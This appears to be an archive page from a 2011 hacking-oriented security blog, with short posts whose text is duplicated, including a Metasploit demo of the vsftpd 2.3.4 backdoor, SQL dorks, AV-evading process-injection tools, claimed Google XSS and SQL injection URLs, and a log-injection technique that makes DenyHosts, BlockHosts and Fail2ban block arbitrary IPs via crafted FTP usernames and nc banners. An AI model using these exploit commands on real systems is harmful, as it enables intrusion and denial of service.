... neuere Einträge
Tuesday, 5. July 2011
Video Demonstration : Vsftpd backdoor
Am Tuesday, 5. Jul 2011 im Topic 'Vulnerabilities'
Affected versions :
vsftpd-2.3.4 from 2011-06-30
https://security.appspot.com/vsftpd.html
https://security.appspot.com/downloads/vsftpd-2.3.4.tar.gz
https://security.appspot.com/downloads/vsftpd-2.3.4.tar.gz.asc
http://pastebin.com/AetT9sS5
Metasploit demo :
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a
http://www.youtube.com/watch?v=WgXm0tgRMos&feature=player_embedded
discovered by Mathias Kresin
vsftpd-2.3.4 from 2011-06-30
https://security.appspot.com/vsftpd.html
https://security.appspot.com/downloads/vsftpd-2.3.4.tar.gz
https://security.appspot.com/downloads/vsftpd-2.3.4.tar.gz.asc
http://pastebin.com/AetT9sS5
Metasploit demo :
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit
id
uname -a
http://www.youtube.com/watch?v=WgXm0tgRMos&feature=player_embedded
discovered by Mathias Kresin
Monday, 4. July 2011
5000 SQL Dorks
Am Monday, 4. Jul 2011 im Topic 'Vulnerabilities'
inurl:declaration_more.php?decl_id=
inurl:Pageid="
.......................
.......................
Download:
http://www62.megaupload.com/files/4cef0fdb4a3a7b84ca88ebdce2e54dc5/Neu_Textdokument.txt
inurl:Pageid="
.......................
.......................
Download:
http://www62.megaupload.com/files/4cef0fdb4a3a7b84ca88ebdce2e54dc5/Neu_Textdokument.txt
Sunday, 3. July 2011
Process Injection Outside of Metasploit
Am Sunday, 3. Jul 2011 im Topic 'Vulnerabilities'
You may find yourself needing to do process injection outside of metasploit/meterpreter. A good examples is when you have a java meterpreter shell or you have access to gui environment (citrix) and/or AV is going all nom nom nom on your metasploit binary.
There are two public options; shellcodeexec and syringe.
Both allow you to generate shellcode using msfpayload (not currently working with msfvenom) and inject that into memory (process for syringe) and get your meterpreter shell.
shellcodeexec
https://github.com/inquisb/shellcodeexec
http://bernardodamele.blogspot.com/2011/04/execute-metasploit-payloads-bypassing.html
= Short description =
shellcodeexec is a small script to execute in memory a sequence of opcodes.
There are two public options; shellcodeexec and syringe.
Both allow you to generate shellcode using msfpayload (not currently working with msfvenom) and inject that into memory (process for syringe) and get your meterpreter shell.
shellcodeexec
https://github.com/inquisb/shellcodeexec
http://bernardodamele.blogspot.com/2011/04/execute-metasploit-payloads-bypassing.html
= Short description =
shellcodeexec is a small script to execute in memory a sequence of opcodes.
Thursday, 30. June 2011
google plus vuln to XSS
Am Thursday, 30. Jun 2011 im Topic 'Vulnerabilities'
pathric due found that google plus application have a parameter thats vulnerable to
XSS
https://plus.google.com/up/start/?sw=1&type=st?p=XSS vuln parameter
http://din.gy./xLSlj
http://din.gy./xLSlj
XSS
https://plus.google.com/up/start/?sw=1&type=st?p=XSS vuln parameter
http://din.gy./xLSlj
http://din.gy./xLSlj
SQL Injection Vulnerability in Google Lab Database System
Am Thursday, 30. Jun 2011 im Topic 'Vulnerabilities'
Hackers Release Step by step proof about this Vulnerability
1. Website : www.googlelabs.com or labs.google.com
2. Vulnerability type : SQL Injection
3. Vulnerable url : http://www.googlelabs.com/?q=%27&apps=Search+Labs
4. Info:
Host IP: 209.85.175.141
Web Server: Google Frontend
Keyword Found: Fast
Injection type is Integer
Video Download link: http://www.bdcyberarmy.com/Google/google_video.avi
1. Website : www.googlelabs.com or labs.google.com
2. Vulnerability type : SQL Injection
3. Vulnerable url : http://www.googlelabs.com/?q=%27&apps=Search+Labs
4. Info:
Host IP: 209.85.175.141
Web Server: Google Frontend
Keyword Found: Fast
Injection type is Integer
Video Download link: http://www.bdcyberarmy.com/Google/google_video.avi
Vulnerable programs
Am Thursday, 30. Jun 2011 im Topic 'Vulnerabilities'
We used DenyHosts on our previous example, because it is one of the most famous tools out there, but it is not the only one vulnerable.
BlockHosts latest version (2.0.3) is also vulnerable to log injection via the vsftp and SSH logs. The reason is the same as DenyHosts: loose regular expressions.
root@slacker:~# ftp 192.168.3.4
220 Welcome to labs ossec candy FTP service.
Name (192.168.2.3:root): lala] FAIL LOGIN: Client “2.3.4.54″
..
(looking at the logs)
Mon Jun 2 21:06:02 2007 [pid 1452] [lala] FAIL LOGIN: Client “2.3.4.54″ ] FAIL LOGIN: Client “192.168.3.1″
If we pass a modified user name in order to inject an IP address, it will block
the fake supplied IP address instead of the valid one.
root@slacker:~# cat /etc/hosts.deny
#—- BlockHosts Additions
ALL: 2.3.4.54 : deny
..
#—- BlockHosts Additions
With the SSH logs, the issue is the same as with DenyHosts. If we inject any data in the protocol identification field, BlockHosts will parse our fake ip addresses instead of the valid one (the exploit for DenyHosts will work with BlockHosts with just a slight change — as a reader exercise).
dcid@enigma:~$ nc 192.168.5.1 22
SSH-1.99-OpenSSH_3.9p1
sshd[123]: User myself from 1.5.6.7 not allowed
Protocol mismatch.
(the logs):
Jun 4 14:49:46 slacker sshd[4153]: Bad protocol version identification ‘sshd[123]: User myself from 1.5.6.7 not allowed ‘ from 10.1.1.14
root@slacker:~# cat /etc/hosts.deny
#—- BlockHosts Additions
ALL: 1.5.6.7 : deny
..
#—- BlockHosts Additions
*BlockHosts author, Avinash Chopde, has released a patch for it.
Fail2ban latest version 0.8 is vulnerable to the same injection via SSH logs that DenyHosts and BlockHosts are. It looks for “ROOT LOGIN REFUSED” anywhere in the logs and as previously shown, we can easily inject that using the bad protocol identification message from ssh.
dcid@enigma:~$ nc 192.168.5.1 22
SSH-1.99-OpenSSH_3.9p1
ROOT LOGIN REFUSED hi FROM 1.5.6.7
Protocol mismatch.
(the logs):
Jun 4 14:49:46 slacker sshd[4153]: Bad protocol version identification ‘ROOT LOGIN REFUSED hi FROM 1.5.6.7 ‘ from 10.1.1.14
*Fail2ban author, Cyril Jaquier, has released a patch for it.
**This issue is similar to CVE-2006-6302, but using a different vector. Thanks to Cyril Jaquier for pointing it out to me.
BlockHosts latest version (2.0.3) is also vulnerable to log injection via the vsftp and SSH logs. The reason is the same as DenyHosts: loose regular expressions.
root@slacker:~# ftp 192.168.3.4
220 Welcome to labs ossec candy FTP service.
Name (192.168.2.3:root): lala] FAIL LOGIN: Client “2.3.4.54″
..
(looking at the logs)
Mon Jun 2 21:06:02 2007 [pid 1452] [lala] FAIL LOGIN: Client “2.3.4.54″ ] FAIL LOGIN: Client “192.168.3.1″
If we pass a modified user name in order to inject an IP address, it will block
the fake supplied IP address instead of the valid one.
root@slacker:~# cat /etc/hosts.deny
#—- BlockHosts Additions
ALL: 2.3.4.54 : deny
..
#—- BlockHosts Additions
With the SSH logs, the issue is the same as with DenyHosts. If we inject any data in the protocol identification field, BlockHosts will parse our fake ip addresses instead of the valid one (the exploit for DenyHosts will work with BlockHosts with just a slight change — as a reader exercise).
dcid@enigma:~$ nc 192.168.5.1 22
SSH-1.99-OpenSSH_3.9p1
sshd[123]: User myself from 1.5.6.7 not allowed
Protocol mismatch.
(the logs):
Jun 4 14:49:46 slacker sshd[4153]: Bad protocol version identification ‘sshd[123]: User myself from 1.5.6.7 not allowed ‘ from 10.1.1.14
root@slacker:~# cat /etc/hosts.deny
#—- BlockHosts Additions
ALL: 1.5.6.7 : deny
..
#—- BlockHosts Additions
*BlockHosts author, Avinash Chopde, has released a patch for it.
Fail2ban latest version 0.8 is vulnerable to the same injection via SSH logs that DenyHosts and BlockHosts are. It looks for “ROOT LOGIN REFUSED” anywhere in the logs and as previously shown, we can easily inject that using the bad protocol identification message from ssh.
dcid@enigma:~$ nc 192.168.5.1 22
SSH-1.99-OpenSSH_3.9p1
ROOT LOGIN REFUSED hi FROM 1.5.6.7
Protocol mismatch.
(the logs):
Jun 4 14:49:46 slacker sshd[4153]: Bad protocol version identification ‘ROOT LOGIN REFUSED hi FROM 1.5.6.7 ‘ from 10.1.1.14
*Fail2ban author, Cyril Jaquier, has released a patch for it.
**This issue is similar to CVE-2006-6302, but using a different vector. Thanks to Cyril Jaquier for pointing it out to me.
Metasploit Framework 3.7.2 incl. Tut
Am Thursday, 30. Jun 2011 im Topic 'Vulnerabilities'
The Metasploit team has spent the last two months focused on one of the least-visible, but most important pieces of the Metasploit Framework; the session backend. Metasploit 3.7 represents a complete overhaul of how sessions are tracked within the framework and associated with the backend database. This release also significantly improves the staging process for the reverse_tcp stager and Meterpreter session initialization. Shell sessions now hold their output in a ring buffer, which allows us to easily view session history -- even if you don't have a database.
download page
http://www.metasploit.com/
TUT:
part1
http://www.hackersbay.in/2011/05/metasploit-basics-tutorial.html
part2
http://www.hackersbay.in/2011/06/metasploit-basics-part-2-using.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+HackersBay+%28Hackers+Bay%29
part3
http://www.hackersbay.in/2011/06/metasploit-basics-part-3.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+HackersBay+%28Hackers+Bay%29
Metasploit Unleashed - Online Free Security Training
Check out
http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training
Pentesting-with-metasploit.pdf
Download
http://www.uploadarea.de/upload/39qs2f18vkvd58mmkgb6vibpo.html
download page
http://www.metasploit.com/
TUT:
part1
http://www.hackersbay.in/2011/05/metasploit-basics-tutorial.html
part2
http://www.hackersbay.in/2011/06/metasploit-basics-part-2-using.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+HackersBay+%28Hackers+Bay%29
part3
http://www.hackersbay.in/2011/06/metasploit-basics-part-3.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+HackersBay+%28Hackers+Bay%29
Metasploit Unleashed - Online Free Security Training
Check out
http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training
Pentesting-with-metasploit.pdf
Download
http://www.uploadarea.de/upload/39qs2f18vkvd58mmkgb6vibpo.html
Top 25 Most Dangerous Software Errors
Am Thursday, 30. Jun 2011 im Topic 'Vulnerabilities'
The 2011 CWE/SANS Top 25 Most Dangerous Software Errors is a list of the most widespread and critical errors that can lead to serious vulnerabilities in software. They are often easy to find, and easy to exploit. They are dangerous because they will frequently allow attackers to completely take over the software, steal data, or prevent the software from working at all.
The Top 25 list is a tool for education and awareness to help programmers to prevent the kinds of vulnerabilities that plague the software industry, by identifying and avoiding all-too-common mistakes that occur before software is even shipped. Software customers can use the same list to help them to ask for more secure software. Researchers in software security can use the Top 25 to focus on a narrow but important subset of all known security weaknesses. Finally, software managers and CIOs can use the Top 25 list as a measuring stick of progress in their efforts to secure their software.
The list is the result of collaboration between the SANS Institute, MITRE, and many top software security experts in the US and Europe.
Download: PDF
http://cwe.mitre.org/top25/archive/2011/2011_cwe_sans_top25.pdf
The Top 25 list is a tool for education and awareness to help programmers to prevent the kinds of vulnerabilities that plague the software industry, by identifying and avoiding all-too-common mistakes that occur before software is even shipped. Software customers can use the same list to help them to ask for more secure software. Researchers in software security can use the Top 25 to focus on a narrow but important subset of all known security weaknesses. Finally, software managers and CIOs can use the Top 25 list as a measuring stick of progress in their efforts to secure their software.
The list is the result of collaboration between the SANS Institute, MITRE, and many top software security experts in the US and Europe.
Download: PDF
http://cwe.mitre.org/top25/archive/2011/2011_cwe_sans_top25.pdf
